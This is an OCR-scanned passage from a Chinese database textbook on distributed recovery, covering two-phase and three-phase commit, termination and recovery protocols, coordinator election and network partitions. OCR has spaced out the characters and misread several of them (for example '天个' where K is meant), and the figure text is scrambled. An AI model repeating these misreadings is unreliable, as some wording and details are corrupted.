e 结 点 S; 月 演 或 是 网 络 故 障 。 
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e 通信 链 路 发 生 故 障 。 

e 网 络 分 区 。 

。 结 点 S: 当前 非常 繁忙 没有 时 间 响 应 消息 。 

要 想 选 定 一 个 合适 的 超时 阅 值 ， 让 结 点 Si 来 判断 能 否 与 结 点 S; 通信 其 实 也 相当 困难 。 






本 


a ) 故障 之 前 b ) 故障 之 后 
图 25-6 网 络 分 区 


25.4.2 ”故障 对 恢复 的 影响 


就 像 本 地 恢复 一 样 ， 分 布 式 恢复 的 目标 是 保证 分 布 式 事务 的 原子 性 和 持久 性 。 为 了 保证 
全 局 性 事务 的 原子 性 ，DDBMS 必须 保证 全 局 事务 的 子 事务 要 么 全 部 提交 要 么 全 部 撤销 。 如 
果 DDBMS 检测 到 有 结 点 发 生 了 故障 或 是 不 可 访问 ， 就 需要 执行 以 下 操作 : 

e 撤销 所 有 被 该 故障 影响 的 事务 。 

e 将 结 点 标示 为 故障 结 点 ， 并 且 防 止 其 他 结 点 试图 对 其 进行 访问 。 

e 定期 地 检查 该 结 点 是 否 被 恢复 ,或 者 等 待 发 生 故 障 的 结 点 广播 恢复 消息 。 

e 重启 时 ， 故 障 结 点 必须 初始 化 一 个 恢复 过 程 ， 用 来 撤销 在 故障 发 生 时 正 活跃 的 事务 


所 做 操作 。 
。 在 本 地 恢复 完成 后 ， 故 障 结 点 必须 更 新 它 的 数据 库 副本 ， 使 其 与 系统 的 其 他 部 分 保 
持 一 致 。 


如 果 发 生 了 像 前 例 中 那样 的 网 络 分 区 ，DDBMS 必须 保证 ， 如 果 同 一 个 全 局 事务 在 两 个 
不 同 的 分 区 中 分 别 有 代 理 活 路 着 ,那么 一 定 不 能 发 生 这 样 的 情形 ， 即 结 点 S1 以 及 与 其 处 于 
同一 分 区 中 的 结 点 决定 提交 该 全 局 性 事务 ， 而 结 点 S; 以 及 与 其 处 于 同一 分 区 的 结 点 却 决定 
撤销 该 事务 ， 这 将 破坏 全 局 性 事务 的 原子 性 。 
分 布 式 恢复 协议 

如 前 所 述 ， 由 于 既 要 求 本 地 子 事务 的 原子 性 又 要 求全 局 事务 的 原子 性 ， 使 得 DDBMS 中 
的 恢复 更 加 复杂 。 在 22.3 节 中 提 到 的 恢复 方法 只 能 保证 子 事务 的 原子 性 ， 但 DDBMS 要 保 
证 全 局 事务 的 原子 性 。 这 涉及 修改 提交 和 撤销 的 过 程 ， 保 证 全 局 事务 在 所 有 子 事务 提交 或 是 
撤销 之 前 不 会 提交 或 是 撤销 。 另 外 ， 修 改 的 协议 要 满足 结 点 和 通信 故障 的 要 求 ， 保 证 一 个 结 
点 的 故障 不 会 影响 到 其 他 结 点 上 的 处 理 过 程 。 换 句 话说， 运行 的 结 点 不 应 当 被 阻塞 。 遵 从 这 
一 点 的 协议 被 称 为 非 阻塞 协议 。 在 接 下 来 的 两 小 节 中 ， 将 考虑 两 种 适用 于 DDBMS 的 通用 协 
议 : 两 段 式 提交 (2PC) 和 非 阻 塞 的 三 段 式 提交 ( 3PC) 协议 。 

假定 每 个 全 局 事务 都 有 一 个 结 点 作为 该 事务 的 协调 器 (或 是 事务 管理 器 )， 通 常 这 个 结 
点 就 是 初始 化 该 事务 的 结 点 。 拥 有 该 全 局 事务 代理 的 结 点 称 为 参与 者 (或 是 资源 管理 器 )。 
假定 协调 器 知道 所 有 参与 者 的 标识 符 ， 每 个 参与 者 也 知道 协调 器 的 标识 符 ， 但 是 各 参与 者 之 
间 不 必 一 定 知道 对 方 的 标识 符 。 
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25.4.3 ”两 段 式 提交 


顾名思义 ， 两 段 式 提交 ( 2PC) 分 两 阶段 操作 : 投票 阶段 和 决定 阶段 。 基 本 想法 是 协调 
器 询问 所 有 的 参与 者 是 否 准备 好 提交 事务 。 如 果 有 一 个 参与 者 投 撤销 票 或 是 由 于 超时 而 没有 
响应 消息 ， 那 么 协调 器 通知 所 有 的 参与 者 撤销 事务 。 如 果 所 有 参与 者 都 投票 提交 ， 那 么 协 
调 器 通知 它们 提交 事务 。 全 局 性 的 决定 必须 由 所 有 的 参与 者 做 出 。 如 果 某 个 参与 者 投 撤销 
票 ， 那 么 它 就 可 以 立刻 撤销 。 事 实 上 ， 任 何 结 点 在 投 提交 票 之 前 ， 都 可 以 自由 地 撤销 事务 。 
这 种 撤销 被 称 为 是 单 边 撤销 。 如 果 参 与 者 投了 提交 票 ， 那 么 必须 等 待 协调 器 广播 全 局 提交 
( global commit) 或 是 全 局 撤销 ( global abort) 消息 。 这 个 协议 假定 每 个 结 点 都 有 自己 的 本 地 
日 志 ， 从 而 可 以 返回 或 可 靠 地 提交 事务 。 两 段 式 提交 涉及 等 待 其 他 结 点 消息 的 进程 。 为 了 防 
止 这 些 进程 被 不 必要 地 堵塞 ,使 用 超时 系统 。 协 调 器 的 提交 过 程 如 下 : 
第 一 阶段 

(1) 在 日 志文 件 中 写 人 begin_commit 记录 ， 并 且 将 日 志 强 制 写 到 可 靠 的 存储 器 中 。 向 
所 有 的 参与 者 发 送 PREPARE 消息 ， 在 系统 规定 的 超时 时 间 内 等 待 参与 者 的 响应 。 
第 二 阶段 

(2 ) 如 果 有 某 个 参与 者 投 回 ABORT 票 ， 在 日 志文 件 中 写 一 个 abort 记录 ， 并 将 日 志 强 
制 写 到 可 靠 的 存储 器 中 。 向 所 有 的 参与 者 发 送 GLOBAL ABORT 消息 ， 在 系统 超时 时 间 内 
等 待 参与 者 的 回复 。 

(3 ) 如 果菜 个 参与 者 投 回 READY_COMMIT 票 ， 更 新 已 经 做 出 响应 的 参与 者 列表 。 如 
果 所 有 的 参与 者 都 投 回 READY_COMMIT 票 ， 在 日 志文 件 中 写 一 个 commit 记录 ， 并 且 将 
日 志 强 制 写 到 可 靠 的 存储 器 中 。 向 所 有 的 参与 者 发 送 GLOBAL_COMMIT 消息 。 在 系统 超 
时 的 时 间 内 等 待 参与 者 的 回复 。 

(4 ) 一 旦 接 到 了 所 有 参与 者 的 回复 ， 向 日 志文 件 中 写 一 个 end_transaction 记录 。 如 果 存 
在 没有 回复 的 结 点 ， 重 发 系统 消息 ， 直 到 收 到 回复 为 止 。 

协调 器 在 收 到 所 有 参与 者 的 投票 消息 之 前 必须 等 待 。 如 果 某 个 结 点 在 规定 时 间 内 没有 给 
出 投票 消息 ， 那 么 协调 器 默认 为 ABORT 消息 ,并 且 向 所 有 的 参与 者 广播 GLOBAL_ABORT 
消息 。 稍 后 讨论 参与 者 故障 重新 启动 时 的 问题 。 参 与 者 提交 的 过 程 如 下 : 

(1 ) 当 参 与 者 接收 到 PREPARE 消息 ， 那 么 : 

e 在 日 志文 件 中 书写 ready_commit 记录 ， 并 且 将 事务 的 日 志 记 录 强 制 写 到 可 靠 的 存储 

器 中 。 给 协调 器 发 送 READY_COMMIT 消息 。 
e 在 日 志文 件 中 书写 abort 记录 ， 并 且 将 日 志 强 制 写 到 可 靠 的 存储 器 中 。 向 协调 器 发 送 
ABORT 消息 。 单 边 撤销 事务 。 

在 系统 的 超时 时 间 内 等 待 协调 器 的 响应 。 

(2 ) 如 果 参 与 者 接 到 GLOBAL _ABORT 消息 ， 在 日 志文 件 中 写 一 个 abort 记录 ， 并 且 将 
日 志 强 制 写 到 可 靠 的 存储 器 中 。 撤 销 事务 并 且 在 完成 后 ， 向 协调 器 发 送 通 知 。 

(3 ) 如 果 参 与 者 接 到 GLOBAL_ COMMIT 消息 ， 在 日 志文 件 中 写 一 个 commit 记录 ， 并 
且 将 日 志 强 制 写 到 可 靠 的 存储 器 中 。 提 交 事 务 ， 为 该 事务 解锁 ， 完 成 后 向 协调 器 发 送 通 知 。 

如 果 参 与 者 接收 不 到 来 自 协调 器 的 投票 指令 ， 就 会 因 超 时 而 撤销 。 因 此 ， 某 个 参与 者 可 
能 在 投票 之 前 就 已 经 撤销 并 执行 了 本 地 撤销 过 程 。 图 25-7 给 出 了 参与 者 投票 提交 或 投票 撤 
销 时 的 情况 。 
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协调 者 参与 者 


交付 : 
在 日 志 中 写 人 begin_commit 记 录 ， 
向 所 有 的 参与 者 发 送 PREPARE 消 息 ， 一 一 准备 : 
等 回复 在 日 志 中 写 ready_commit 记 录 ， 
准备 提交 : < 一 一 ”向 协调 器 发 送 READY_COMMIT 消 息 ， 


如 果 所 有 参与 者 都 投 READY 票 : 等 GLOBAL_COMMIT 或 GLOBAL_ABORT 
在 日 志 中 写 人 commit 记 录 ， 
向 所 有 的 参与 者 发 送 GLOBAL COMMIT 消 息 一 一 > 全 局 交付 : 
等 待 参与 者 的 回复 在 日 志 中 写 入 commit 记 录 

画 复 ; 交付 事务 
如 果 所 有 参与 者 均 已 回复 所 一 一 ”发送 回复 

在 日 志 中 写 人 end_transaction 记 录 


a ) 参与 者 投票 提交 的 2PC 协 议 





协调 者 


交付 : 
在 日 志 中 写 人 begin_commit 记 录 ， 
向 所 有 的 参与 者 发 送 PREPARE 消 息 ， 一 一 > 准备 : 
等 回复 在 日 志 中 写 abort 记 录 ， 


< 一 一 向 协调 器 发 送 ABORT， 


撤销 : 
如 果 有 参与 者 投 ABORT 票 : 撤销 事务 
在 日 志 中 写 人 abort 记 录 ， 


等 待 参与 者 的 回复 





b ) 参与 者 投票 撤销 的 2PC 协 议 
图 25-7 2PC 总 结 


参与 者 不 得 不 等 待 协 调 器 的 GLOBAL COMMIT 或 是 GLOBAL ABORT 消息 ， 如 果 参 
与 者 没有 能 够 从 协调 器 接收 到 消息 ， 或 者 是 协调 器 没有 能 够 得 到 参与 者 的 响应 ， 那 么 就 假定 
这 个 结 点 已 经 发 生 了 故障 ， 并 且 实 行 终止 协议 。 只 有 仍 在 运行 的 结 点 遵循 终止 协议 ， 故 障 结 
点 重新 启动 时 遵循 恢复 协议 。 
2PC 终止 协议 

当 协 调 器 或 是 参与 者 不 能 够 接收 到 预期 的 消息 且 超 时 的 时 候 就 会 实行 终止 协议 。 具 体 采 
取 何 种 动作 则 取决 于 是 协调 器 还 是 参与 者 发 生 了 超时 。 
协调 器 

提交 过 程 中 协调 器 有 四 种 状态 : INITIAL、WAITING、DECIDED 和 COMPLETED ， 如 
图 25-8a 所 示 的 状态 转换 图 。 但 是 其 中 只 有 两 个 状态 可 能 出 现 超时 现象 。 采 取 的 动作 如 下 : 

e 在 WAITING 状态 出 现 超 时 。 协 调 器 在 等 待 所 有 的 参与 者 发 出 希望 提交 事务 还 是 撤 

销 事 务 的 通知 。 在 这 种 情况 下 ， 协 调 器 不 能 够 提交 事务 ， 因 为 并 没有 得 到 全 部 参与 
者 的 投票 ， 但 是 可 以 决定 全 局 性 撤销 事务 。 
e 在 DECIDED 状态 出 现 超 时 。 协 调 器 在 等 待 所 有 的 参与 者 是 否 已 成 功 提 交 事 务 或 撤 
销 事务 的 通知 。 在 这 种 情况 下 ， 协 调 器 只 是 简单 地 向 没有 发 出 确认 通知 的 结 点 重 发 
全 局 决定 。 
参与 者 
最 简单 的 终止 协议 是 将 参与 者 进程 挂 起 直到 与 协调 器 的 通信 重新 建立 为 止 。 这 样 参与 者 
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可 以 得 到 全 局 消息 并 据 此 恢复 进程 。 当 然 ， 还 可 以 进行 一 些 其 他 操作 来 改善 其 性 能 。 
在 提交 过 程 中 ， 参 与 者 可 有 四 种 状态 : INITIAL、PREPARED、ABORTED 和 COMMITTED， 
如 图 25-8b 所 示 。 但 是 ， 参 与 者 只 会 在 前 两 个 状态 中 出 现 超时 : 
e 在 INITIAL 状态 出 现 超时 。 参 与 者 在 等 待 协调 器 的 PREPARE 消息 ， 这 说 明 协 调 器 
一 定 是 在 INITIAL 状态 下 出 现 了 故障 。 在 这 种 情况 下 ， 参 与 者 可 以 单 边 撤销 事务 。 
如 果 后 来 又 接 到 了 PREPARE 消息 ， 参 与 者 可 以 简单 地 忽略 此 消息 ， 这 样 协调 器 方 
面 以 后 会 因 超时 而 撤销 全 局 事务 ， 参 与 者 也 可 以 向 协调 器 发 送 ABORT 通知 。 
e 在 PREPARED 状态 出 现 超 时 。 参 与 者 在 等 待 全 局 提交 事务 或 全 局 撤销 事务 的 指令 。 
此 时 参与 者 一 定 已 经 向 协调 器 投了 提交 票 ， 所 以 不 能 出 尔 反 尔 地 撤销 事务 。 同 样 ， 
它 也 不 能 自作 主张 地 提交 事务 ， 因 为 全 局 性 决定 也 可 能 为 撤销 事务 。 在 没有 得 到 更 
多 的 信息 之 前 ， 参 与 者 只 能 挂 起 等 待 。 但 是 ， 参 与 者 可 以 与 其 他 参与 者 进行 联系 ， 
找到 知晓 决定 信息 者 。 这 就 是 所 谓 合作 终止 协议 〈( cooperative termination protocol) 。 
告知 参与 者 关于 其 他 参与 者 信息 的 最 简便 方法 就 是 ， 协 调 器 在 发 出 投票 指令 时 附加 
一 个 参与 者 列表 。 
虽然 合作 终止 协议 减少 了 阻塞 的 可 能 性 ， 但 阻塞 仍 会 存在 ， 被 阻塞 的 进程 将 不 得 不 一 直 
尝试 当 故 障 被 修复 时 结束 阻塞 。 如 果 仅 是 协调 器 故障 ， 而 所 有 参与 者 由 于 执行 合作 终止 协议 
而 得 知 了 这 一 点 ， 它 们 可 以 推选 一 个 新 协调 器 以 解决 阻塞 ， 下面 对 此 讨论 。 





a ) 协调 器 b ) 参与 者 
图 25-8 2PC 的 状态 转换 图 


2PC 的 恢复 协议 
刚刚 讨论 了 仍 在 运行 的 结 点 对 故障 采取 的 行动 ， 现 在 考虑 故障 结 点 在 恢复 过 程 中 的 行 
动 。 重 新 启动 时 的 动作 同样 也 与 故障 时 刻 协调 器 和 参与 者 所 处 的 状态 有 关 。 
协调 器 故障 
在 这 里 分 别 考虑 协调 器 在 三 种 不 同 状态 下 发 生 故障 : 
e 在 INITIAL 状态 发 生 故 障 。 协 调 器 还 没有 开始 提交 过 程 。 在 这 种 情况 下 恢复 就 是 开 
始 提交 过 程 。 
e 在 WAITING 状态 发 生 故 障 。 协 调 器 已 经 发 出 了 PREPARE 消息 ， 虽 然 还 没有 收 到 
全 部 的 回复 ， 但 也 没有 接收 一 个 撤销 通知 。 在 这 种 情况 下 ， 恢 复 协议 重新 启动 提交 
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过 程 。 

e 在 DECIDED 状态 发 生 故 障 。 协 调 器 已 经 向 参与 者 发 出 了 全 局 撤销 事务 或 全 局 提交 
事务 的 指令 。 在 重新 启动 的 时 候 ， 如 果 协 调 器 接收 到 所 有 的 确认 ， 那 么 可 以 成 功 地 
完成 事务 。 否 则 ， 就 不 得 不 启动 前 面 提 到 的 终止 协议 。 

参与 者 故障 

对 于 参与 者 ， 恢 复 程序 的 目标 是 保证 参与 者 在 重新 启动 时 执行 和 其 他 参与 者 同样 的 操 
作 ， 并 且 这 种 重新 启动 可 以 立刻 执行 (也 就 是 ， 不 需要 和 协调 器 及 其 他 参与 者 协商 )。 在 这 
里 ， 考 虑 参与 者 发 生 故障 时 所 处 的 三 种 不 同 状 态 : 

@ 在 INITIAL 状态 发 生 故 障 。 参 与 者 还 没有 对 事务 进行 投票 。 因 此 ， 在 恢复 的 时 候 可 

以 单 边 撤销 事务 ， 因 为 对 于 协调 器 来 说 没有 这 个 参与 者 的 投票 ， 就 不 可 能 发 出 全 局 
提交 决定 。 

e@ 在 PREPARED 状态 发 生 故 障 。 参 与 者 已 经 向 协调 器 投了 提交 票 。 在 这 种 情况 下 ， 恢 
复 协议 要 调用 前 面 提 到 的 终止 协议 。 

e 在 ABORTED/COMMITTED 状态 发 生 故 障 。 参 与 者 已 经 完成 了 事务 ， 因 此 在 重新 启 
动 时 ， 不 需要 做 进一步 的 动作 。 

选举 协议 

如 果 参 与 者 们 检测 (通过 超时 ) 到 协调 器 的 故障 ， 它 们 可 以 选择 一 个 新 的 结 点 作为 协调 
器 。 一 种 选举 协议 是 基于 结 点 已 约定 的 线性 顺序 。 我 们 若 假定 结 点 ;在 序列 中 的 位 置 是 i, 
顺序 号 最 小 的 结 点 作为 协调 器 ， 每 个 结 点 都 知道 系统 中 其 他 结 点 的 标识 符 和 序列 号 ， 其 中 的 
某 些 可 能 已 发 生 故障 。 那 么 另 一 种 选举 协议 是 ， 要 求 所 有 仍 在 运行 中 的 参与 者 向 标识 序号 大 
的 结 点 发 送 消息 。 这 样 ， 结 点 S 将 依次 向 结 点 Si 十 1, Si 十 2, …, S; 发 送 消息 。 如 果 结 点 Si 收 
到 了 从 顺序 号 更 小 的 结 点 发 送 来 的 消息 ，Sx 就 知道 它 自己 不 可 能 是 新 的 协调 器 并 停止 向 外 发 
送 消息 。 

这 个 协议 相对 比较 高 效 ， 大 部 分 参与 者 很 快 就 停止 了 向 外 发 送 消 息 。 最 后 ， 每 个 参与 者 
都 会 知道 是 否 存 在 一 个 顺序 号 比 自己 更 小 的 参与 者 仍 在 运行 。 如 果 某 个 参与 者 找 不 到 顺序 号 
比 自己 小 的 参与 者 ,那么 它 就 成 为 新 的 协调 器 。 如 果 新 选择 的 协调 器 在 这 个 过 程 中 仍然 出 现 
超时 ， 那 么 将 再 次 调用 这 个 选举 协议 。 

当 故 障 结 点 恢复 后 ， 它 立即 调用 选举 协议 。 如 果 没 有 顺序 号 比 它 更 小 的 运行 结 点 ， 它 将 
强迫 所 有 顺序 号 较 大 的 结 点 将 其 作为 新 的 协调 器 ， 而 不 管 是 否 已 有 一 个 新 协调 器 。 
2PC 的 通信 拓扑 结构 

存在 几 种 交换 消息 的 方法 ， 或 者 称 为 通信 拓扑 结构 ， 可 以 用 来 实现 2PC。 前 面 讨 论 的 一 
种 称 为 集中 式 2PC， 因 为 所 有 的 通信 都 是 通过 协调 器 的 ， 如 图 25-9a 所 示 。 对 于 集中 式 2PC 
协议 进行 的 若干 改进 ， 不 论 是 减少 需要 交换 消息 的 数量 ， 还 是 加 速决 定 过 程 ， 其 目的 都 是 为 
了 提高 性 能 。 这 些 改进 也 都 依赖 于 交换 消息 所 采取 的 不 同方 式 。 

一 种 方法 是 使 用 线性 2PC ， 其 中 参与 者 相互 之 间 可 以 进行 通信 ， 如 图 25-9b 所 示 。 在 线 
性 2PC 中 ， 结 点 按照 1, 2, …, n 排序 ， 其 中 结 点 1 是 协调 器 ， 其 他 的 结 点 是 参与 者 。2PC 协 
议 在 投票 阶段 是 按照 从 协调 器 到 参与 者 n 的 正 向 链 执行 的 ， 在 决定 阶段 是 按照 从 参与 者 n 到 
协调 器 的 反 向 链 执行 的 。 在 投票 阶段 ， 协 调 器 向 结 点 2 传递 投票 指令 ， 结 点 进行 投票 并 且 将 
投票 结果 传递 给 结 点 3。 结 点 3 将 自己 的 投票 结果 和 结 点 2 的 结果 相 结合 ， 并 且 将 结合 的 结 
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果 传 递 给 结 点 4， 如 此 进行 下 去 。 当 第 个 参与 者 进行 投票 的 时 候 ， 全 局 决定 就 产生 了 ， 并 
且 反 向 传递 给 参与 者 n-1、n-2 等 ， 最 后 回 到 协调 器 。 虽 然 线性 2PC 比 集中 式 2PC 使 用 了 更 
少 的 消息 ， 但 是 此 线性 顺序 不 允许 任何 并 行 。 

如 果 投 票 过 程 采取 正 向 的 线性 消息 链 ， 而 决定 过 程 采 用 集中 式 拓扑 结构 ， 线 性 2PC 可 
以 得 到 改进 ， 这 样 结 点 n 可 以 并 行 地 向 所 有 参与 者 广播 全 局 决定 (Bernstein 等 人 ，1987 )。 

第 三 种 方法 称 为 分 布 式 2PC， 使 用 了 分 布 式 拓 扑 结 构 ， 如 图 25-9c 所 示 。 协 调 器 向 所 有 
参与 者 发 送 PREPARE 消息 ， 参 与 者 依次 向 其 他 结 点 发 送 自身 决定 。 每 个 参与 者 在 做 出 提交 
事务 或 撤销 事务 决定 之 前 等 待 其 他 结 点 的 消息 。 这 在 效果 上 就 不 再 需要 2PC 协议 的 决定 阶 
段 ， 因 为 每 个 参与 者 可 以 独立 、 一 致 地 做 出 决定 (Skeen，1981 )。 





c ) 分 布 式 
图 25-9 2PC 拓 扑 结 构 : C= 协调 器 ; Pi= 参与 者 ; RC=READY_COMMIT; GC= 
GLOBAL COMMIT; GA=GLOBAL ABORT 


25.4.4 三 段 式 提交 

可 以 看 到 ，2PC 不 是 一 种 非 阻 塞 协议 ， 因 为 在 特定 的 情形 下 结 点 可 能 会 发 生 阻 塞 。 例 如 ， 
一 个 进程 在 投票 提交 后 超时 ， 那 么 在 接收 到 协调 器 的 全 局 指令 之 前 ， 如 果 它 能 进行 通信 的 那 
些 结 点 同样 不 清楚 全 局 决定 ， 该 结 点 就 会 发 生 阻塞 。 实际 上 ， 在 现实 中 大 部 分 使 用 2PC 的 
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系统 中 ,阻塞 发 生 的 可 能 性 非常 小 。 然 而 ， 还 是 存在 一 种 称 为 三 段 式 提交 ( 3PC) 协议 的 非 
阻塞 协议 (Skeen，1981 )。 对 于 结 点 故障 ， 除 非 是 全 部 的 结 点 发 生 了 故障 ， 否 则 三 段 式 提交 
总 是 非 阻 塞 的 。 然 而 ， 通 信 故 障 可 能 在 不 同 的 结 点 形成 不 同 的 决定 ， 从 而 影响 了 全 局 事务 的 
原子 性 。 这 就 要 求 该 协议 

。 没有 网 络 分 区 发 生 。 

e 至 少 有 一 个 结 点 是 始终 可 用 的 。 

e 最 多 允许 有 天 个 结 点 同时 发 生 故 障 (系统 分 类 为 K- 可 弹 )。 

3PC 的 基本 思想 是 ， 为 那些 已 投 COMMIT 票 的 参与 者 ， 去 除 仍 需 等 待 协调 器 的 作出 全 
局 撤销 或 者 全 局 提交 决定 这 样 一 个 不 确定 阶段 。 三 段 式 提交 引入 了 第 三 个 阶段 ， 称 为 预 提 
交 阶 段 ， 介 于 投票 阶段 和 全 局 决定 阶段 之 间 。 协 调 器 在 收 到 所 有 参与 者 的 提交 投票 后 ， 发 
送 一 个 全 局 PRE-COMMIT 消息 。 接 收 到 全 局 预 提 交 消 息 的 任何 参与 者 即 知道 其 他 所 有 的 参 
与 者 都 已 经 投票 COMMIT ， 此 时 参与 者 本 身 将 肯定 提交 ， 除 非 发 生 了 故障 。 每 个 收 到 PRE- 
COMMIT 消息 的 参与 者 都 发 回收 到 通知 ,一旦 协调 器 接收 到 所 有 的 通知 ， 就 发 出 全 局 提交 
消息 。 若 有 参与 者 投 ABORT 票 ， 人 处理 方法 与 2PC 完全 相同 。 

图 25-10 给 出 了 协调 器 和 参与 者 的 新 状态 转换 图 。 协 调 器 和 参与 者 都 有 一 个 等 待 阶 段 ， 
但 是 重要 的 特性 是 ， 在 第 一 个 进程 被 提交 之 前 ，PRE-COMMIT 消息 会 发 送 给 所 有 在 运行 的 
进程 ， 使 他 们 知晓 全 局 提交 决定 ， 从 而 可 以 在 出 现 故障 时 独立 地 采取 行动 。 

此 时 如 果 协 调 器 出 现 故障 ， 仍 运行 的 结 点 可 互相 通信 以 决定 是 提交 或 是 撤销 ， 不 必 等 待 
协调 器 恢复 。 若 没有 一 个 运行 结 点 收 到 了 PRE-COMMIT 消息 ， 那 它们 将 撤销 事务 。 

所 有 参与 者 投 COMMIT 票 的 过 程 显示 在 图 25-11， 下 面 主要 讨论 3PC 的 终止 和 恢复 
协议 。 





a ) 协调 器 b ) 参与 者 
图 25-10 ”3PC 的 状态 转换 图 


3PC 终止 协议 
与 2PC 时 一 样 ， 发 生 超时 时 采取 何 种 动作 取决 协调 器 和 参与 者 当时 处 于 何 种 状态 。 
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协调 者 


在 日 志 中 写 入 begin_commit 记 录 ， 
向 所 有 的 参与 者 发 送 PREPARE 消 息 ， 准备 : 
等 回复 在 日 志 中 写 ready_commiti 记 


向 协调 器 发 送 READY a 
准备 提交 : 等 PRE_COMMIT 或 GLOBAL_ABORT 
如 果 所 有 参与 者 都 投 READY 票 ; 
在 日 志 中 写 入 pre_commit 记 录 
向 所 有 的 人 参与 者 发 送 PRE | COMMIT 消 息 一 一 > 预 交 付 : 
等 待 参与 者 的 回复 和 


正式 交付 : 
如 果 至 少 有 K 个 参与 者 都 回复 了 PRE_COMMTT'， 
在 日 志 中 写 人 commit 记 录 ， 一 一 >> 全 局 交付 : 
向 所 有 的 参与 者 发 送 GLOBAL_COMMIT 消 息 在 日 志 写 人 commit 记 录 
等 待 参与 者 的 回复 


< 一 一 ”交付 事务 并 回复 


回复 : 
如 果 所 有 参与 者 均 已 回复 
在 日 志 中 写 入 end_transaction 记 录 
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协调 器 ”协调 器 在 提交 过 程 中 可 能 处 于 五 种 状态 ， 如 图 25-10a 所 示 。 但 是 只 可 能 在 其 
中 三 个 状态 出 现 超时 现象 。 对 应 的 动作 如 下 : 

e 在 WAITING 状态 出 现 超时 。 这 与 2PC 一 致 。 协 调 器 在 等 待 所 有 的 参与 者 发 送 希 望 
提交 或 是 撤销 的 通知 。 因 此 它 决 定 全 局 撤销 该 事务 。 

e 在 PRE-COMMIT 状态 出 现 超 时 。 已 向 所 有 参与 者 发 送 PRE-COMMIT 消息 ， 因 此 它 
们 不 是 处 于 PRE-COMMIT 状态 就 是 处 于 PREPARE 状态 。 此 时 ， 协 调 器 可 向 日 志文 
件 写 一 个 commit 记录 然后 结束 该 事务 ， 同时 向 所 有 参与 者 发 送 GLOBAL COMMIT 
消息 。 

e 在 DECIDED 状态 出 现 超时 。 这 与 2PC 一 致 。 协 调 器 在 等 待 所 有 的 参与 者 是 否 已 成 
功 提交 或 撤销 事务 的 通知 。 在 这 种 情况 下 ， 协调 器 只 是 简单 地 向 没有 发 出 确认 通知 
的 结 点 重 发 全 局 决定 。 

参与 者 ”参与 者 在 提交 过 程 可 能 处 于 五 种 状态 ， 如 图 25-10b 所 示 。 但 是 只 可 能 在 其 中 

三 种 状态 下 出 现 超时 ， 对 应 动作 如 下 : 

e 在 INITIAL 状态 出 现 超时 。 这 与 2PC 一 致 。 参 与 者 在 等 待 协 调 器 的 PREPARE 消 
息 ， 此 时 参与 者 可 以 单 边 撤销 事务 。 

e 在 PREPARED 状态 出 现 超时 。 参 与 者 已 向 协调 器 投了 提交 事务 的 票 ， 正 在 等 待 全 局 
提交 或 撤销 事务 的 决定 。 此 时 ， 该 参与 者 可 遵循 选举 协议 为 该 事务 选 出 一 个 新 协调 
器 ， 并 按 下 面 将 给 出 的 讨论 终止 。 

e 在 PRE-COMMIT 状态 出 现 超时 。 该 参与 者 已 发 送 收 到 了 PRE-COMMIT 消息 的 回 
复 ， 正 在 等 待 COMMIT 消息 。 同 样 ， 该 参与 者 可 遵循 选举 协议 为 该 事务 选 出 一 个 新 
协调 器 ， 并 按 下 面 的 讨论 终止 。 

3PC 恢复 协议 

与 2PC 一 样 ， 重 新 启动 后 的 动作 也 与 发 生 故 障 时 协调 器 和 参与 者 所 处 的 状态 有 关 。 

协调 器 故障 ”在 这 里 考虑 协调 器 发 生 故 障 时 的 四 种 不 同 状态 : 

e 在 INITIAL 状态 发 生 故 障 。 协 调 器 还 没有 开始 提交 过 程 。 这 种 情况 下 的 恢复 是 开始 
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提交 过 程 。 
e 在 WAITING 状态 发 生 故 障 。 参 与 者 们 可 能 已 经 选举 了 新 协调 器 并 终止 了 事务 。 重 
启 时 ， 协 调 器 应 与 其 他 结 点 联系 以 决定 事务 的 命运 。 
e 在 PRE-COMMIT 状态 发 生 故 障 。 同 样 ， 参 与 者 们 可 能 已 经 选举 了 新 协调 器 并 终止 
了 事务 。 重 启 时 ， 协 调 器 应 与 其 他 结 点 联系 以 决定 事务 的 命运 。 
e 在 DECIDED 状态 发 生 故 障 。 协 调 器 已 经 向 参与 者 发 出 了 全 局 撤销 或 全 局 提交 事务 
的 指令 。 在 重新 启动 的 时 候 ， 如 果 协 调 器 接收 到 所 有 的 确认 ， 那 么 可 以 成 功 地 完成 
事务 。 和 否则 ， 就 不 得 不 重启 前 面 提 到 的 终止 协议 。 
参与 者 故障 ”下面 考虑 参与 者 在 四 种 不 同 状态 下 发 生 故 障 : 
在 INITIAL 状态 发 生 故 障 。 参 与 者 还 没有 对 事务 进行 投票 。 因 此 ， 人 恢复 时 可 以 单 边 撤 
销 事务 。 
@ 在 PREPARED 状态 发 生 故障 。 参 与 者 已 经 向 协调 器 投了 提交 票 。 在 这 种 情况 下 ， 参 
与 者 应 与 其 他 结 点 联系 以 决定 事务 的 命运 。 
e 在 PRE-COMMIT 状态 发 生 故障 。 参 与 者 应 与 其 他 结 点 联系 以 决定 事务 的 命运 。 
e 在 ABORTED/COMMITTED 状态 发 生 故 障 。 参 与 者 已 经 完成 了 事务 ， 因 此 在 重新 启 
动 时 ， 不 需要 做 进一步 的 动作 。 
选举 新 协调 器 后 的 终止 协议 
前 面 讨论 的 关于 2PC 的 选举 协议 也 可 用 于 超时 后 参与 者 选举 新 协调 器 。 新 选 出 的 协调 
器 将 向 涉及 的 所 有 参与 者 发 送 一 个 STATE-REQ 消息 以 寻求 如 何 最 好 地 继续 事务 。 新 协调 器 
可 用 如 下 规则 : 
(1 ) 如 果 某 些 参 与 者 已 经 撤销 ， 则 决定 全 局 撤销 。 
(2 ) 如 果 某 些 参与 者 已 经 提交 ， 则 决定 全 局 提交 。 
(3 ) 如 果 有 回答 的 所 有 参与 者 都 不 肯定 ， 则 决定 全 局 撤销 。 
(4) 如 果 某 些 参与 者 能 提交 事务 了 ( 即 已 处 于 PRE-COMMIT 状态 )， 则 决定 全 局 提交 。 
为 防止 阻塞 ， 新 协调 器 首先 发 送 PRE-COMMIT 消息 ,一 旦 参与 者 回复 ， 则 发 送 GLOBAL- 
COMMIT 消息 。 


25.4.5 网络 分 区 


当 发 生 网 络 分 区 时 要 维持 数据 库 的 一 致 性 可 能 更 困难 ， 这 主要 取决 于 数据 是 否 被 复制 。 
如 果 数 据 没 被 复制 ， 那 么 只 有 当 事 务 的 执行 不 需要 用 到 其 初始 化 结 点 所 在 分 区 之 外 的 任何 结 
点 上 的 数据 时 ， 该 事务 才能 继续 进行 。 和 否则 ， 事 务 需要 等 待 ， 直 到 它 需 要 访问 的 结 点 再 次 可 
